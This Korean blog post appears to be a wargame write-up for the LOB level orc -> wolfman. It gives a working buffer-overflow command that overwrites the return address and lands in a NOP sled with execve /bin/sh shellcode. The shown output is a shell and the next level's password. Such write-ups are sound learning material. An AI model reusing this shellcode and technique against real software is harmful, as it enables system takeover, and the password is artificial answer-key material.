buffer 를 초기화 시키는 게 추가됨.
일단 버퍼 + SFP + RET + NOP + SHELLCODE
방식으로 버퍼에 넣는것이 아닌, RET 뒤에 NOP 슬라이드와 쉘코드를 넣어야 할듯.
중요한건 bash2 로 해야한다는것
bash 는 \xff 를 다르게 인식함.
[orc@localhost orc]$ ./wolfman `python -c 'print"\x90"*44 + "\x2c\xfc\xff\xbf" + "\x90"*1000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
��������������������������������������������,�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������1�Ph//shh/bin��PS��1Ұ
bash$ my-pass
euid = 505
love eyuna
'Wargame > LOB(끝)' 카테고리의 다른 글
| darkelf -> orge (0) | 2015.01.29 |
|---|---|
| wolfman -> darkelf (0) | 2015.01.29 |
| goblin -> orc (0) | 2015.01.28 |
| cobolt -> goblin (0) | 2015.01.28 |
| gremlin -> cobolt (0) | 2015.01.23 |